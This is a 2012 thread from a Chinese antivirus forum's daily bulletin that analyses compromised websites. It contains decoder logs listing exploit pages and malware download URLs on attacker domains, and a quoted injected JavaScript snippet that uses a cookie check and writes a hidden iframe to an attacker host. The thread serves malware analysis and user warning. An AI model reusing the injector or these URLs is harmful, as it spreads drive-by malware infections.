瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 每日网马播报 » 瑞星网站每日安全播报(2012年4月9日)
networkedition - 2012-4-9 13:18:00


引用:
网址均来自瑞星每日安全播报,我们详细分析其中所挂恶意网址,对于已失效的恶意网址就不再分析。



引用:
注:以下分析出的恶意网址均包含有真实网马下载地址,请勿直接下载并运行,以免系统中招。



引用:



1.  http://www.5igo.com.cn/(我爱购)
2.  http://www.2nvx.com/(爱女性网 )
3.  http://www.8368piao.com/(8368票务)
4.  http://www.weixiuwang.com/(中国维修网)




用户系统信息:Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.802.30 Safari/535.1 SE 2.X MetaSr 1.0
networkedition - 2012-4-9 13:19:00
Log generated by networkedition use mdecoder 0.67
[root]http://www.5igo.com.cn/ie.html(Exploit.IEAurora.a)
    [virus]http://www.5igo.com.cn/tse.exe
networkedition - 2012-4-9 13:19:00
Log generated by networkedition use mdecoder 0.67
[root]http://www.2nvx.com/mop.html
[virus]http://www.2nvx.com/y.exe
networkedition - 2012-4-9 13:19:00
Log generated by networkedition use mdecoder 0.67
[root]http://www.8368piao.com/(五月天南京演唱会订票 五月天南京诺亚方舟  8368票务)
    [script]http://www.8368piao.com/seldate.js
    [script]http://www.8368piao.com/objectSwap.js
    [flash]http://www.8368piao.com/images/sfcimg.swf
    [script]http://chat32.live800.com/live800/chatClient/floatButton.js?jid=7615727654&companyID=122742&configID=4243&codeType=custom
        [script]http://st8.live800.com/live800/chatClient/floatButtonStatic.js
    [script]http://chat32.live800.com/live800/chatClient/monitor.js?jid=7615727654&companyID=122742&configID=4227&codeType=custom
    [script]http://www.8368piao.com/hm.baidu.com/h.js?b167c766d0132cadd1b0a70abfb4c0bc
    [script]http://jhlw.m18.us/b.js?google=4x053
[script]http://jhlw.m18.us/g/hpay.htm
    [exp]http://jhlw.m18.us/g/6.htm(Exploit.Ie0dayCVE0806.a)
        [script]http://jhlw.m18.us/g/ie.jpg
        [script]http://jhlw.m18.us/g/iee.jpg
[virus]http://jhlw.m18.us/o/xz.exe
    [iframe]http://jhlw.m18.us/g/medi.htm
    [iframe]http://jhlw.m18.us/g/7.htm
        [script]http://jhlw.m18.us/g/ie.jpg
        [script]http://jhlw.m18.us/g/iee.jpg
        [script]http://jhlw.m18.us/g/ieee.jpg
networkedition - 2012-4-9 13:20:00
Log generated by networkedition use mdecoder 0.67
[root]http://www.weixiuwang.com/aboutus/(关于中维--中国维修网--中国最大的维修网站--中国维修网)
    [script]http://eax.UglyAs.com/b.js?google=2x273
[script]http://jjd.ns02.us/a/jday.htm
    [exp]http://jjd.ns02.us/a/6.htm(Exploit.Ie0dayCVE0806.a)
        [script]http://jjd.ns02.us/a/ie.jpg
        [script]http://jjd.ns02.us/a/iee.jpg
[virus]http://jjd.ns02.us/o/yd.exe
    [iframe]http://jjd.ns02.us/a/medi.htm
    [iframe]http://jjd.ns02.us/a/7.htm
        [script]http://jjd.ns02.us/a/ie.jpg
        [script]http://jjd.ns02.us/a/iee.jpg
        [script]http://jjd.ns02.us/a/ieee.jpg
[script]http://fcp.UglyAs.com/b.js?google=3x222
    [script]http://feq.UglyAs.com/b.js?google=4x091
whatisright - 2012-4-9 19:24:00
xxx.ns02.us肯定是个有问题的网站。
在我这边利用Mdecoder无法获得http://jjd.ns02.us/a/jday.htm这类的网页。
经过分析,这类的网页通常是由http://eax.UglyAs.com/b.js?google=2x273这类的js引入的。
想问的是,在什么情况下可以获得jday.htm?是否与cookie还有关系?
谢谢。
jzking121 - 2012-4-9 21:38:00


引用:
function baiduuu(){
var Then = new Date()
Then.setTime(Then.getTime() + 12*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookvie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{
var visa="yl39";
var fire="<ifra"+"me sr";
document.cookie = "Cookvie1=yous;expires="+ Then.toGMTString()
document.write("");
document.write(fire+"c=http:\/\/jhlw.m18.us\/g\/hpay.htm wid"+"th=100 hei"+"ght=0><\/ifr"+"ame>");
document.write("
");
}
}baiduuu();


这段js,判断用户在12小时内是否访问过,访问过不弹,没有访问过则弹!
whatisright - 2012-4-10 12:27:00
:kaka12: 非常感谢!!!
1
查看完整版本: 瑞星网站每日安全播报(2012年4月9日)